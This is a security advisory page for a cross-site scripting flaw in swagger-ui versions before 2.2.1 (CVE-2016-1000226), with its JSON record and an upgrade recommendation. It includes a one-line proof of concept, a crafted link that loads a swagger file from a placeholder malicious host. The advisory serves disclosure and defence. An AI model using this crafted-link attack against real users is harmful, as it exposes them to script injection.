GHSA-7F59-X49P-V8MQ

Vulnerability from github – Published: 2020-09-01 15:28 – Updated: 2021-09-23 21:29
VLAI?
Summary
Cross-Site Scripting in swagger-ui
Details

Affected versions of swagger-ui are vulnerable to cross-site scripting in both the consumes and produces parameters of the swagger JSON document for a given API.

Additionally, swagger-ui allows users to load arbitrary swagger JSON documents via the query string parameter url, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.

Proof of Concept

``` http:///swagger-ui/index.html?url=http:///malicious-swagger-file.json ````

Recommendation

Update to version 2.2.1 or later.

Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "swagger-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2016-1000226"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:11:35Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.\n\nAdditionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.\n\n## Proof of Concept\n\n```\nhttp://\u003cUSER_HOSTNAME\u003e/swagger-ui/index.html?url=http://\u003cMALICIOUS_HOSTNAME\u003e/malicious-swagger-file.json\n````\n\n\n\n## Recommendation\n\nUpdate to version 2.2.1 or later.",
  "id": "GHSA-7f59-x49p-v8mq",
  "modified": "2021-09-23T21:29:50Z",
  "published": "2020-09-01T15:28:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000226"
    },
    {
      "type": "WEB",
      "url": "https://github.com/swagger-api/swagger-ui/issues/1866"
    },
    {
      "type": "WEB",
      "url": "https://github.com/swagger-api/swagger-ui/pull/1867"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/swagger-api/swagger-ui"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/123"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Cross-Site Scripting in swagger-ui"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.